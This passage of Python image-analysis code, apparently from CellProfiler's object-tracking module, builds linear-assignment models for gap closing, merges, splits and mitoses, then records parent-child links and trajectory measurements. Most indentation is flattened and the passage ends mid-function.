# caps the parent and makes it unavailable as a candidate
# for a gap closing. In the best case, there is only one
# mitosis candidate for the left and right child and
# the left and right child are connected to gap alternatives,
# but there may be competing splits, gap closings or
# other mitoses.
#
# We take a greedy approach, ordering the mitoses by their
# scores and fulfilling them. After processing the mitoses,
# we run LAP again, keeping only the parent nodes of untaken
# mitoses and child nodes connected to gap alternatives
#
# End[i] <----> Mitosis[j]
#
##################################################
end_nodes = []
start_nodes = []
scores = []
#
# The offsets and lengths of the start/end node ranges
#
start_end_off = 0
start_end_len = len(L)
gap_off = start_end_end = start_end_len
gap_end = gap_off + start_end_len
#-------------------------------------------
#
# Null model (do nothing)
#
#-------------------------------------------
for first, second in ((end_nodes, start_nodes),
(start_nodes, end_nodes)):
first.append(np.arange(start_end_len))
second.append(np.arange(start_end_len) + gap_off)
scores.append(np.ones(start_end_len) * gap_cost/2)
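# Each track end and each track start is tied to its gap alternative at
# gap_cost/2, so leaving both sides of a potential bridge unlinked costs
# gap_cost in total -- the "do nothing" price any gap closing must beat.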
#------------------------------------------
#
# Gap-closing model
#
#------------------------------------------
#
# Create the edges between ends and starts.
# The edge weight is the gap pair cost.
#
a, gap_scores = self.get_gap_pair_scores(F, L, max_frame_difference)
# filter by max gap score
mask = gap_scores <= max_gap_score
if np.sum(mask) > 0:
a, gap_scores = a[mask], gap_scores[mask]
end_nodes.append(a[:, 0])
start_nodes.append(a[:, 1])
scores.append(gap_scores)
#
# Hook the gap alternative ends of the starts to
# the gap alternative starts of the ends
#
end_nodes.append(a[:, 1] + gap_off)
start_nodes.append(a[:, 0] + gap_off)
scores.append(np.zeros(len(gap_scores)))
#---------------------------------------------------
#
# Merge model
#
#---------------------------------------------------
#
# merge_lidx is the index of the track that ends; merge_p1idx is the
# index into P1 of the object to be merged into
#
merge_off = gap_end
if len(P1) > 0:
# Do the initial winnowing in chunks of 10m pairs
lchunk_size = 10000000 / len(P1)
chunks = []
for lstart in range(0, len(L), lchunk_size):
lend = min(len(L), lstart+lchunk_size)
merge_p1idx, merge_lidx = \
[_.flatten() for _ in np.mgrid[0:len(P1), lstart:lend]]
z = (P1[merge_p1idx, IIDX] - L[merge_lidx, IIDX]).astype(np.int32)
mask = (z <= max_frame_difference) & (z > 0)
if np.sum(mask) > 0:
chunks.append([_[mask] for _ in merge_p1idx, merge_lidx, z])
if len(chunks) > 0:
merge_p1idx, merge_lidx, z = [
np.hstack([_[i] for _ in chunks]) for i in range(3)]
else:
merge_p1idx = merge_lidx = z = np.zeros(0, np.int32)
else:
merge_p1idx = merge_lidx = z = np.zeros(0, np.int32)
if len(z) > 0:
# Calculate penalty = distance * area penalty
AreaLast = L[merge_lidx, AIDX]
AreaBeforeMerge = P[P1[merge_p1idx, PIDX].astype(int) - 1, AIDX]
AreaAtMerge = P1[merge_p1idx, AIDX]
rho = self.calculate_area_penalty(
AreaLast + AreaBeforeMerge, AreaAtMerge)
    d = np.sqrt(np.sum((L[merge_lidx, :2]-P1[merge_p1idx, :2])**2, 1))
merge_scores = d * rho
mask = merge_scores <= max_merge_score
merge_p1idx, merge_lidx, merge_scores = [
_[mask] for _ in merge_p1idx, merge_lidx, merge_scores]
merge_len = np.sum(mask)
if merge_len > 0:
#
# The end nodes are the ends being merged to the intermediates
# The start nodes are the intermediates and have node #s
# that start at merge_off
#
end_nodes.append(merge_lidx)
start_nodes.append(merge_off + np.arange(merge_len))
scores.append(merge_scores)
#
# Hook the gap alternative starts for the ends to
# the merge nodes
#
end_nodes.append(merge_off + np.arange(merge_len))
start_nodes.append(merge_lidx + gap_off)
scores.append(np.ones(merge_len) * gap_cost / 2)
#
# The alternative hypothesis is represented by merges hooked
# to merges
#
end_nodes.append(merge_off + np.arange(merge_len))
start_nodes.append(merge_off + np.arange(merge_len))
scores.append(np.ones(merge_len) * merge_alternative_cost)
else:
merge_len = 0
merge_end = merge_off+merge_len
#------------------------------------------------------
#
# Split model
#
#------------------------------------------------------
split_off = merge_end
if len(P2) > 0:
    lchunk_size = max(1, 10000000 / len(P2))
chunks = []
for fstart in range(0, len(L), lchunk_size):
fend = min(len(L), fstart+lchunk_size)
split_p2idx, split_fidx = \
[_.flatten() for _ in np.mgrid[0:len(P2), fstart:fend]]
z = (F[split_fidx, IIDX] - P2[split_p2idx, IIDX]).astype(np.int32)
mask = (z <= max_frame_difference) & (z > 0)
if np.sum(mask) > 0:
chunks.append(
[_[mask] for _ in split_p2idx, split_fidx, z])
if len(chunks) > 0:
split_p2idx, split_fidx, z = [
np.hstack([_[i] for _ in chunks]) for i in range(3)]
else:
split_p2idx = split_fidx = z = np.zeros(0, np.int32)
else:
split_p2idx = split_fidx = z = np.zeros(0, int)
if len(z) > 0:
AreaFirst = F[split_fidx, AIDX]
AreaAfterSplit = P[ P2[split_p2idx, PIDX].astype(int) + 1, AIDX]
AreaAtSplit = P2[split_p2idx, AIDX]
d = np.sqrt(np.sum((F[split_fidx, :2] - P2[split_p2idx, :2])**2, 1))
rho = self.calculate_area_penalty(
AreaFirst + AreaAfterSplit, AreaAtSplit)
split_scores = d * rho
mask = (split_scores <= max_split_score)
split_p2idx, split_fidx, split_scores = \
[_[mask] for _ in split_p2idx, split_fidx, split_scores]
split_len = np.sum(mask)
if split_len > 0:
#
# The end nodes are the intermediates (starting at split_off)
# The start nodes are the F
#
end_nodes.append(np.arange(split_len) + split_off)
start_nodes.append(split_fidx)
scores.append(split_scores)
#
# Hook the alternate ends to the split starts
#
end_nodes.append(split_fidx + gap_off)
start_nodes.append(np.arange(split_len) + split_off)
scores.append(np.ones(split_len) * gap_cost/2)
#
# The alternate hypothesis is split nodes hooked to themselves
#
end_nodes.append(np.arange(split_len) + split_off)
start_nodes.append(np.arange(split_len) + split_off)
scores.append(np.ones(split_len) * split_alternative_cost)
else:
split_len = 0
split_end = split_off + split_len
#----------------------------------------------------------
#
# Mitosis model
#
#----------------------------------------------------------
mitoses, mitosis_scores = self.get_mitotic_triple_scores(F, L)
n_mitoses = len(mitosis_scores)
MDLIDX = 0 # index of left daughter
MDRIDX = 1 # index of right daughter
MPIDX = 2 # index of parent
if n_mitoses > 0:
    order = np.argsort(mitosis_scores)
    mitoses, mitosis_scores = mitoses[order], mitosis_scores[order]
mitoses_parent_lidx = mitoses[:, MPIDX]
mitoses_left_child_findx = mitoses[:, MDLIDX]
mitoses_right_child_findx = mitoses[:, MDRIDX]
#
# Create the ranges for mitoses
#
mitosis_off = split_end
mitosis_len = n_mitoses
mitosis_end = mitosis_off + mitosis_len
if n_mitoses > 0:
#
# Taking the mitosis score will cost us the parent gap at least.
#
end_nodes.append(mitoses_parent_lidx)
start_nodes.append(np.arange(n_mitoses) + mitosis_off)
scores.append(mitosis_scores)
#
# Balance the mitosis against the gap alternative.
#
end_nodes.append(np.arange(n_mitoses) + mitosis_off)
start_nodes.append(mitoses_parent_lidx + gap_off)
scores.append(np.ones(n_mitoses) * gap_cost / 2)
#
# The alternative hypothesis links mitosis to mitosis
# We charge the alternative hypothesis the mitosis_alternative
# cost.
#
end_nodes.append(np.arange(n_mitoses) + mitosis_off)
start_nodes.append(np.arange(n_mitoses) + mitosis_off)
scores.append(np.ones(n_mitoses) * mitosis_alternative_cost)
i = np.hstack(end_nodes)
j = np.hstack(start_nodes)
c = scores = np.hstack(scores)
#-------------------------------------------------------
#
# LAP Processing # 1
#
x, y = lapjv(i, j, c)
score_matrix = scipy.sparse.coo.coo_matrix((c, (i, j))).tocsr()
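#
# Note on conventions (inferred from the usage below, not stated in the
# original): lapjv solves the assignment problem over the sparse edges
# (i, j, c); x[e] gives the start/column node matched to end/row node e,
# and y[s] gives the end/row node matched to start/column node s, so x
# and y are inverse permutations of each other.
#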
#---------------------------
#
# Useful debugging diagnostics
#
def desc(node):
'''Describe a node for graphviz'''
fl = F
if node < start_end_end:
fmt = "N%d:%d"
idx = node
elif node < gap_end:
fmt = "G%d:%d"
idx = node - gap_off
elif node < merge_end:
fmt = "M%d:%d"
idx = merge_p1idx[node - merge_off]
fl = P1
elif node < split_end:
fmt = "S%d:%d"
idx = split_p2idx[node - split_off]
fl = P2
else:
mitosis = mitoses[node - mitosis_off]
(lin, lon), (rin, ron), (pin, pon) = [
(image_numbers[fl[idx, IIDX]], fl[idx, ONIDX])
for idx, fl in zip(mitosis, (F, F, L))]
return "n%d[label=\"MIT%d:%d->%d:%d+%d:%d\"]" % (
node, pin, pon, lin, lon, rin, ron)
return "n%d[label=\"%s\"]" % (
node, fmt % (image_numbers[int(fl[idx, IIDX])],
int(fl[idx, ONIDX])))
def write_graph(path, x, y):
'''Write a graphviz DOT file'''
with open(path, "w") as fd:
fd.write("digraph trackobjects {\n")
graph_idx = np.where(
(x != np.arange(len(x))) & (y != np.arange(len(y))))[0]
for idx in graph_idx:
fd.write(desc(idx)+";\n")
for idx in graph_idx:
fd.write("n%d -> n%d [label=%0.2f];\n" %
(idx, x[idx], score_matrix[idx, x[idx]]))
fd.write("}\n")
#
#--------------------------------------------------------
#
# Mitosis fixup.
#
good_mitoses = np.zeros(len(mitoses), bool)
for midx, (lidx, ridx, pidx) in enumerate(mitoses):
#
# If the parent was not accepted or either of the children
# have been assigned to a mitosis, skip
#
if x[pidx] == midx + mitosis_off and not \
any([y[idx] >= mitosis_off and y[idx] < mitosis_end
for idx in lidx, ridx]):
alt_score = sum([score_matrix[y[idx], idx] for idx in lidx, ridx])
#
# Taking the alt score would cost us a mitosis alternative
# cost, but would remove half of a gap alternative.
#
alt_score += mitosis_alternative_cost - gap_cost / 2
#
# Alternatively, taking the mitosis score would cost us
# the gap alternatives of the left and right.
#
if alt_score > mitosis_scores[midx] + gap_cost:
for idx in lidx, ridx:
old_y = y[idx]
if old_y < start_end_end:
x[old_y] = old_y + gap_off
else:
x[old_y] = old_y
y[lidx] = midx + mitosis_off
y[ridx] = midx + mitosis_off
good_mitoses[midx] = True
continue
x[pidx] = pidx + gap_off
y[pidx+gap_off] = pidx
x[midx+mitosis_off] = midx+mitosis_off
y[midx+mitosis_off] = midx+mitosis_off
if np.sum(good_mitoses) == 0:
good_mitoses = np.zeros((0, 3), int)
good_mitosis_scores = np.zeros(0)
else:
good_mitoses, good_mitosis_scores = \
mitoses[good_mitoses], mitosis_scores[good_mitoses]
#
#-------------------------------------
#
# Rerun to see if reverted mitoses could close gaps.
#
if np.any(x[mitoses[:, MPIDX]] != np.arange(len(mitoses)) + mitosis_off):
rerun_end = np.ones(mitosis_end, bool)
rerun_start = np.ones(mitosis_end, bool)
rerun_end[:start_end_end] = x[:start_end_end] < mitosis_off
rerun_end[mitosis_off:] = False
rerun_start[:start_end_end] = y[:start_end_end] < mitosis_off
rerun_start[mitosis_off:] = False
mask = rerun_end[i] & rerun_start[j]
i, j, c = i[mask], j[mask], c[mask]
i = np.hstack((i,
good_mitoses[:, MPIDX],
good_mitoses[:, MDLIDX] + gap_off,
good_mitoses[:, MDRIDX] + gap_off))
j = np.hstack((j,
good_mitoses[:, MPIDX] + gap_off,
good_mitoses[:, MDLIDX],
good_mitoses[:, MDRIDX]))
c = np.hstack((c, np.zeros(len(good_mitoses) * 3)))
x, y = lapjv(i, j, c)
#
# Fixups to measurements
#
# fixup[N] gets the fixup dictionary for image set, N
#
# fixup[N][FEATURE] gets a tuple of a list of object numbers and
# values.
#
fixups = {}
def add_fixup(feature, image_number, object_number, value):
if image_number not in fixups:
fixups[image_number] = { feature: ([object_number], [value])}
else:
fid = fixups[image_number]
if feature not in fid:
fid[feature] = ([object_number], [value])
else:
object_numbers, values = fid[feature]
object_numbers.append(object_number)
values.append(value)
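# Illustrative example (assumed values): after
#   add_fixup(F_LINK_TYPE, 5, 2, LT_GAP)
#   add_fixup(F_LINK_TYPE, 5, 7, LT_SPLIT)
# fixups == {5: {F_LINK_TYPE: ([2, 7], [LT_GAP, LT_SPLIT])}} -- parallel
# lists of object numbers and values, keyed by image number and feature.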
# Attach different segments together if they were matched through the LAP
a = -np.ones(len(F)+1, dtype="int32")
b = -np.ones(len(F)+1, dtype="int32")
c = -np.ones(len(F)+1, dtype="int32")
d = -np.ones(len(F)+1, dtype="int32")
z = np.zeros(len(F)+1, dtype="int32")
# relationships is a list of parent-child relationships. Each element
# is a two-tuple of parent and child and each parent/child is a
# two-tuple of image index and object number:
#
# [((<parent-image-index>, <parent-object-number>),
# (<child-image-index>, <child-object-number>))...]
#
relationships = []
#
# Starts can be linked to the following:
# ends (start_end_off <= j < start_end_off+start_end_len)
# gap alternatives (gap_off <= j < gap_end)
# splits (split_off <= j < split_end)
# mitosis children (handled separately above via good_mitoses)
#
# Discard starts linked to self = "do nothing"
#
start_idxs = np.where(
y[:start_end_end] != np.arange(gap_off, gap_end))[0]
for i in start_idxs:
my_image_index = int(F[i, IIDX])
my_image_number = image_numbers[my_image_index]
my_object_index = int(F[i, OIIDX])
my_object_number = int(F[i, ONIDX])
yi = y[i]
if yi < gap_end:
#-------------------------------
#
# GAP
#
# y[i] gives index of last hooked to first
#
b[i+1] = yi+1
c[yi+1] = i+1
#
# Hook our parent image/object number to found parent
#
parent_image_index = int(L[yi, IIDX])
parent_object_number = int(L[yi, ONIDX])
parent_image_number = image_numbers[parent_image_index]
parent_image_numbers[my_image_index][my_object_index] = \
parent_image_number
parent_object_numbers[my_image_index][my_object_index] = \
parent_object_number
relationships.append(
((parent_image_index, parent_object_number),
(my_image_index, my_object_number)))
add_fixup(F_LINK_TYPE, my_image_number, my_object_number,
LT_GAP)
add_fixup(F_GAP_LENGTH, my_image_number, my_object_number,
my_image_index - parent_image_index)
add_fixup(F_GAP_SCORE, my_image_number, my_object_number,
scores[yi])
#
# One less new object
#
new_object_count[my_image_index] -= 1
#
# One less lost object (the lost object is recorded in
# the image set after the parent)
#
lost_object_count[parent_image_index + 1] -= 1
logger.debug("Gap closing: %d:%d to %d:%d, score=%f" %
(parent_image_number, parent_object_number,
image_numbers[my_image_index],
object_numbers[my_image_index][my_object_index],
score_matrix[yi, i]))
elif yi >= split_off and yi < split_end:
#------------------------------------
#
# SPLIT
#
p2_idx = split_p2idx[yi - split_off]
parent_image_index = int(P2[p2_idx, IIDX])
parent_image_number = image_numbers[parent_image_index]
parent_object_number = int(P2[p2_idx, ONIDX])
b[i+1] = P2[p2_idx, LIDX]
c[b[i+1]] = i+1
parent_image_numbers[my_image_index][my_object_index] = \
parent_image_number
parent_object_numbers[my_image_index][my_object_index] = \
parent_object_number
relationships.append(
((parent_image_index, parent_object_number),
(my_image_index, my_object_number)))
add_fixup(F_LINK_TYPE, my_image_number, my_object_number,
LT_SPLIT)
add_fixup(F_SPLIT_SCORE, my_image_number, my_object_number,
split_scores[yi - split_off])
#
# one less new object
#
new_object_count[my_image_index] -= 1
#
# one more split object
#
split_count[my_image_index] += 1
logger.debug("split: %d:%d to %d:%d, score=%f" %
(parent_image_number, parent_object_number,
image_numbers[my_image_index],
object_numbers[my_image_index][my_object_index],
split_scores[y[i] - split_off]))
#---------------------
#
# Process ends (parents)
#
end_idxs = np.where(
x[:start_end_end] != np.arange(gap_off, gap_end))[0]
for i in end_idxs:
if(x[i] < start_end_end):
a[i+1] = x[i]+1
d[a[i+1]] = i+1
elif(x[i] >= merge_off and x[i] < merge_end):
#-------------------
#
# MERGE
#
# Handle merged objects. A merge hooks the end (L) of
# a segment (the parent) to a gap alternative in P1 (the child)
#
p1_idx = merge_p1idx[x[i]-merge_off]
a[i+1] = P1[p1_idx, LIDX]
d[a[i+1]] = i+1
parent_image_index = int(L[i, IIDX])
parent_object_number = int(L[i, ONIDX])
parent_image_number = image_numbers[parent_image_index]
child_image_index = int(P1[p1_idx, IIDX])
child_object_number = int(P1[p1_idx, ONIDX])
relationships.append(
((parent_image_index, parent_object_number),
(child_image_index, child_object_number)))
add_fixup(F_MERGE_SCORE, parent_image_number,
parent_object_number,
merge_scores[x[i] - merge_off])
lost_object_count[parent_image_index+1] -= 1
merge_count[child_image_index] += 1
logger.debug("Merge: %d:%d to %d:%d, score=%f" %
(image_numbers[parent_image_index]
, parent_object_number,
image_numbers[child_image_index],
child_object_number,
merge_scores[x[i] - merge_off]))
for (mlidx, mridx, mpidx), score in\
zip(good_mitoses, good_mitosis_scores):
#
# The parent is attached, one less lost object
#
lost_object_count[int(L[mpidx, IIDX])+1] -= 1
a[mpidx+1] = F[mlidx, LIDX]
d[a[mpidx+1]] = mpidx+1
parent_image_index = int(L[mpidx, IIDX])
parent_image_number = image_numbers[parent_image_index]
parent_object_number = int(L[mpidx, ONIDX])
    split_count[int(F[mlidx, IIDX])] += 1
for idx in mlidx, mridx:
#--------------------------------------
#
# MITOSIS child
#
my_image_index = int(F[idx, IIDX])
my_image_number = image_numbers[my_image_index]
my_object_index = int(F[idx, OIIDX])
my_object_number = int(F[idx, ONIDX])
b[idx+1] = int(L[mpidx, LIDX])
c[b[idx+1]] = idx+1
parent_image_numbers[my_image_index][my_object_index] = \
parent_image_number
parent_object_numbers[my_image_index][my_object_index] = \
parent_object_number
relationships.append(
((parent_image_index, parent_object_number),
(my_image_index, my_object_number)))
add_fixup(F_LINK_TYPE, my_image_number, my_object_number,
LT_MITOSIS)
add_fixup(F_MITOSIS_SCORE, my_image_number, my_object_number,
score)
new_object_count[my_image_index] -= 1
logger.debug("Mitosis: %d:%d to %d:%d and %d, score=%f" %
(parent_image_number, parent_object_number,
image_numbers[F[mlidx, IIDX]],
F[mlidx, ONIDX],
F[mridx, ONIDX],
score))
#
# At this point a gives the label # of the track that connects
# to the end of the indexed track. b gives the label # of the
# track that connects to the start of the indexed track.
# We convert these into edges.
#
# aa and bb are the vertices of an edge list and aa[i],bb[i]
# make up an edge
#
connect_mask = (a != -1)
aa = a[connect_mask]
bb = np.argwhere(connect_mask).flatten()
connect_mask = (b != -1)
aa = np.hstack((aa, b[connect_mask]))
bb = np.hstack((bb, np.argwhere(connect_mask).flatten()))
#
# Connect self to self for indices that do not connect
#
disconnect_mask = (a == -1) & (b == -1)
aa = np.hstack((aa, np.argwhere(disconnect_mask).flatten()))
bb = np.hstack((bb, np.argwhere(disconnect_mask).flatten()))
z = all_connected_components(aa, bb)
newlabel = [z[label[i]] for i in range(len(label))]
#
# Replace the labels for the image sets in the group
# inside the list retrieved from the measurements
#
m_link_type = self.measurement_name(F_LINK_TYPE)
for i, image_number in enumerate(image_numbers):
n_objects = len(newlabel[i])
m.add_measurement(cpmeas.IMAGE,
self.image_measurement_name(F_LOST_OBJECT_COUNT),
lost_object_count[i], True, image_number)
m.add_measurement(cpmeas.IMAGE,
self.image_measurement_name(F_NEW_OBJECT_COUNT),
new_object_count[i], True, image_number)
m.add_measurement(cpmeas.IMAGE,
self.image_measurement_name(F_MERGE_COUNT),
merge_count[i], True, image_number)
m.add_measurement(cpmeas.IMAGE,
self.image_measurement_name(F_SPLIT_COUNT),
split_count[i], True, image_number)
if n_objects == 0:
continue
m.add_measurement(object_name,
self.measurement_name(F_LABEL),
newlabel[i], can_overwrite = True,
image_set_number = image_number)
m.add_measurement(object_name,
self.measurement_name(F_PARENT_IMAGE_NUMBER),
parent_image_numbers[i],
can_overwrite = True,
image_set_number = image_number)
m.add_measurement(object_name,
self.measurement_name(F_PARENT_OBJECT_NUMBER),
parent_object_numbers[i],
can_overwrite = True,
image_set_number = image_number)
is_fixups = fixups.get(image_number, None)
if (is_fixups is not None) and (F_LINK_TYPE in is_fixups):
link_types = m[object_name, m_link_type, image_number]
object_numbers, values = [
np.array(_) for _ in is_fixups[F_LINK_TYPE]]
link_types[object_numbers-1] = values
m[object_name, m_link_type, image_number] = link_types
for feature, data_type in (
(F_GAP_LENGTH, np.int32),
(F_GAP_SCORE, np.float32),
(F_MERGE_SCORE, np.float32),
(F_SPLIT_SCORE, np.float32),
(F_MITOSIS_SCORE, np.float32)):
if data_type == np.int32:
values = np.zeros(n_objects, data_type)
else:
values = np.ones(n_objects, data_type) * np.NaN
if (is_fixups is not None) and (feature in is_fixups):
object_numbers, fixup_values = [
np.array(_) for _ in is_fixups[feature]]
values[object_numbers-1] = fixup_values
m[object_name, self.measurement_name(feature), image_number] =\
values
#
# Write the relationships.
#
if len(relationships) > 0:
relationships = np.array(relationships)
parent_image_numbers = image_numbers[relationships[:, 0, 0]]
child_image_numbers = image_numbers[relationships[:, 1, 0]]
parent_object_numbers = relationships[:, 0, 1]
child_object_numbers = relationships[:, 1, 1]
m.add_relate_measurement(
self.module_num, R_PARENT, object_name, object_name,
parent_image_numbers, parent_object_numbers,
child_image_numbers, child_object_numbers)
self.recalculate_group(workspace, image_numbers)
def calculate_area_penalty(self, a1, a2):
'''Calculate a penalty for areas that don't match
Ideally, area should be conserved while tracking. We divide the larger
of the two areas by the smaller of the two to get the area penalty,
which is then multiplied by the distance.
Note that this differs from Jaqaman eqn 5, which has an asymmetric
penalty (sqrt((a1 + a2) / b) for a1+a2 > b and b / (a1 + a2) for
a1+a2 < b). I can't think of a good reason why it should be
asymmetric.
'''
result = a1 / a2
result[result < 1] = 1/result[result < 1]
result[np.isnan(result)] = np.inf
return result
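# Worked example (illustrative only): for a1 = [4., 2., 0.] and
# a2 = [2., 4., 0.] the penalty is [2., 2., inf] -- symmetric in its
# arguments, with the 0/0 NaN mapped to infinity so degenerate pairs
# are never chosen by the assignment step.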
def get_gap_pair_scores(self, F, L, max_gap):
'''Compute scores for matching last frame with first to close gaps
F - an N x 3 (or more) array giving X, Y and frame # of the first object
in each track
L - an N x 3 (or more) array giving X, Y and frame # of the last object
in each track
max_gap - the maximum allowed # of frames between the last and first
Returns: an M x 2 array of M pairs where the first element of the array
is the index of the track whose last frame is to be joined to
the track whose index is the second element of the array.
an M-element vector of scores.
'''
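# Illustrative example (assumed data): if track 0 ends at frame 3 and
# track 1 starts at frame 5, then with max_gap >= 2 the pair (0, 1) is
# generated below and scored as euclidean distance times area penalty.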
#
# There have to be at least two things to match
#
nothing = (np.zeros((0, 2), int), np.zeros(0))
if F.shape[0] <= 1:
return nothing
X = 0
Y = 1
IIDX = 2
AIDX = 6
#
# Create an indexing ordered by the last frame index and by the first
#
i = np.arange(len(F))
j = np.arange(len(F))
f_iidx = F[:, IIDX].astype(int)
l_iidx = L[:, IIDX].astype(int)
i_lorder = np.lexsort((i, l_iidx))
j_forder = np.lexsort((j, f_iidx))
i = i[i_lorder]
j = j[j_forder]
i_counts = np.bincount(l_iidx)
j_counts = np.bincount(f_iidx)
i_indexes = Indexes([i_counts])
j_indexes = Indexes([j_counts])
#
# The lowest possible F for each L is 1+L
#
j_self = np.minimum(np.arange(len(i_counts)),
len(j_counts) - 1)
j_first_idx = j_indexes.fwd_idx[j_self] + j_counts[j_self]
#
# The highest possible F for each L is L + max_gap. j_end is the
# first illegal value... just past that.
#
j_last = np.minimum(np.arange(len(i_counts)) + max_gap,
len(j_counts)-1)
j_end_idx = j_indexes.fwd_idx[j_last] + j_counts[j_last]
#
# Structure the i and j block ranges
#
ij_counts = j_end_idx - j_first_idx
ij_indexes = Indexes([i_counts, ij_counts])
if ij_indexes.length == 0:
return nothing
#
# The index into L of the first element of the pair
#
ai = i[i_indexes.fwd_idx[ij_indexes.rev_idx] + ij_indexes.idx[0]]
#
# The index into F of the second element of the pair
#
aj = j[j_first_idx[ij_indexes.rev_idx] + ij_indexes.idx[1]]
#
# The distances
#
d = np.sqrt((L[ai, X] - F[aj, X]) ** 2 +
(L[ai, Y] - F[aj, Y]) ** 2)
#
# Rho... the area penalty
#
rho = self.calculate_area_penalty(L[ai, AIDX], F[aj, AIDX])
return np.column_stack((ai, aj)), d * rho
def get_mitotic_triple_scores(self, F, L):
'''Compute scores for matching a parent to two daughters
F - an N x 3 (or more) array giving X, Y and frame # of the first object
in each track
L - an N x 3 (or more) array giving X, Y and frame # of the last object
in each track
Returns: an M x 3 array of M triples where the first column is the
index in the L array of the parent cell and the remaining
columns are the indices of the daughters in the F array
an M-element vector of distances of the parent from the expected
'''
X = 0
Y = 1
IIDX = 2
AIDX = 6
if len(F) <= 1:
return np.zeros((0, 3), np.int32), np.zeros(0, np.int32)
max_distance = self.mitosis_max_distance.value
# Find all daughter pairs within same frame
i, j = np.where(F[:, np.newaxis, IIDX] == F[np.newaxis, :, IIDX])
i, j = i[i < j], j[i < j] # get rid of duplicates and self-compares
#
# Calculate the maximum allowed distance before one or the other
# daughter is farther away than the maximum allowed from the center
#
# That's the max_distance * 2 minus the distance
#
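# Example of this rule (illustrative): with max_distance = 10 and
# daughters 8 apart, dmax = 2 * 10 - 8 = 12; daughters separated by more
# than 2 * max_distance produce a negative dmax and are rejected below.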
dmax = max_distance * 2 - np.sqrt(np.sum((F[i, :2] - F[j, :2]) ** 2, 1))
mask = dmax >= 0
i, j = i[mask], j[mask]
if len(i) == 0:
return np.zeros((0, 3), np.int32), np.zeros(0, np.int32)
center_x = (F[i, X] + F[j, X]) / 2
center_y = (F[i, Y] + F[j, Y]) / 2
frame = F[i, IIDX]
# Find all parent-daughter pairs where the parent
# is in the frame previous to the daughters
ij, k = [_.flatten() for _ in np.mgrid[0:len(i), 0:len(L)]]
mask = F[i[ij], IIDX] == L[k, IIDX]+1
ij, k = ij[mask], k[mask]
if len(ij) == 0:
return np.zeros((0, 3), np.int32), np.zeros(0, np.int32)
d = np.sqrt((center_x[ij] - L[k, X]) ** 2 +
(center_y[ij] - L[k, Y]) ** 2)
mask = d <= dmax[ij]
ij, k, d = ij[mask], k[mask], d[mask]
if len(ij) == 0:
return np.zeros((0, 3), np.int32), np.zeros(0, np.int32)
rho = self.calculate_area_penalty(
F[i[ij], AIDX] + F[j[ij], AIDX], L[k, AIDX])
return np.column_stack((i[ij], j[ij], k)), d * rho
def recalculate_group(self, workspace, image_numbers):
'''Recalculate all measurements once post_group has run
workspace - the workspace being operated on
image_numbers - the image numbers of the group's image sets' measurements
'''
m = workspace.measurements
object_name = self.object_name.value
assert isinstance(m, cpmeas.Measurements)
image_index = np.zeros(np.max(image_numbers)+1, int)
image_index[image_numbers] = np.arange(len(image_numbers))
image_index[0] = -1
index_to_imgnum = np.array(image_numbers)
parent_image_numbers, parent_object_numbers = [
[ m.get_measurement(
object_name, self.measurement_name(feature), image_number)
for image_number in image_numbers]
for feature in (F_PARENT_IMAGE_NUMBER, F_PARENT_OBJECT_NUMBER)]
#
# Do all_connected_components on the graph of parents to find groups
# that share the same ancestor
#
count = np.array([len(x) for x in parent_image_numbers])
idx = Indexes(count)
if idx.length == 0:
# Nothing to do
return
parent_image_numbers = np.hstack(parent_image_numbers).astype(int)
parent_object_numbers = np.hstack(parent_object_numbers).astype(int)
parent_image_indexes = image_index[parent_image_numbers]
parent_object_indexes = parent_object_numbers - 1
i = np.arange(idx.length)
i = i[parent_image_numbers != 0]
j = idx.fwd_idx[parent_image_indexes[i]] + parent_object_indexes[i]
# Link self to self too
i = np.hstack((i, np.arange(idx.length)))
j = np.hstack((j, np.arange(idx.length)))
labels = all_connected_components(i, j)
nlabels = np.max(labels) + 1
#
# Set the ancestral index for each label
#
ancestral_index = np.zeros(nlabels, int)
ancestral_index[labels[parent_image_numbers == 0]] =\
np.argwhere(parent_image_numbers == 0).flatten().astype(int)
ancestral_image_index = idx.rev_idx[ancestral_index]
ancestral_object_index = \
ancestral_index - idx.fwd_idx[ancestral_image_index]
#
# Blow these up to one per object for convenience
#
ancestral_index = ancestral_index[labels]
ancestral_image_index = ancestral_image_index[labels]
ancestral_object_index = ancestral_object_index[labels]
def start(image_index):
'''Return the start index in the array for the given image index'''
return idx.fwd_idx[image_index]
def end(image_index):
'''Return the end index in the array for the given image index'''
return start(image_index) + idx.counts[0][image_index]
def slyce(image_index):
return slice(start(image_index), end(image_index))
class wrapped(object):
'''make an indexable version of a measurement, with parent and ancestor fetching'''
def __init__(self, feature_name):
self.feature_name = feature_name
self.backing_store = np.hstack([
m.get_measurement(object_name, feature_name, i)
for i in image_numbers])
def __getitem__(self, index):
return self.backing_store[slyce(index)]
def __setitem__(self, index, val):
self.backing_store[slyce(index)] = val
m.add_measurement(object_name, self.feature_name, val,
image_set_number = image_numbers[index],
can_overwrite=True)
def get_parent(self, index, no_parent=None):
result = np.zeros(idx.counts[0][index],
self.backing_store.dtype)
my_slice = slyce(index)
mask = parent_image_numbers[my_slice] != 0
if not np.all(mask):
if np.isscalar(no_parent) or (no_parent is None):
result[~mask] = no_parent
else:
result[~mask] = no_parent[~mask]
if np.any(mask):
result[mask] = self.backing_store[
idx.fwd_idx[parent_image_indexes[my_slice][mask]] +
parent_object_indexes[my_slice][mask]]
return result
def get_ancestor(self, index):
return self.backing_store[ancestral_index[slyce(index)]]
#
# Recalculate the trajectories
#
x = wrapped(M_LOCATION_CENTER_X)
y = wrapped(M_LOCATION_CENTER_Y)
trajectory_x = wrapped(self.measurement_name(F_TRAJECTORY_X))
trajectory_y = wrapped(self.measurement_name(F_TRAJECTORY_Y))
integrated = wrapped(self.measurement_name(F_INTEGRATED_DISTANCE))
dists = wrapped(self.measurement_name(F_DISTANCE_TRAVELED))
displ = wrapped(self.measurement_name(F_DISPLACEMENT))
linearity = wrapped(self.measurement_name(F_LINEARITY))
lifetimes = wrapped(self.measurement_name(F_LIFETIME))
label = wrapped(self.measurement_name(F_LABEL))
final_age = wrapped(self.measurement_name(F_FINAL_AGE))
age = {} # Dictionary of per-label ages
if self.wants_lifetime_filtering.value:
minimum_lifetime = self.min_lifetime.value if self.wants_minimum_lifetime.value else -np.Inf
maximum_lifetime = self.max_lifetime.value if self.wants_maximum_lifetime.value else np.Inf
for image_number in image_numbers:
index = image_index[image_number]
this_x = x[index]
if len(this_x) == 0:
continue
this_y = y[index]
last_x = x.get_parent(index, no_parent=this_x)
last_y = y.get_parent(index, no_parent=this_y)
x_diff = this_x - last_x
y_diff = this_y - last_y
#
# TrajectoryX,Y = X,Y distances traveled from step to step
#
trajectory_x[index] = x_diff
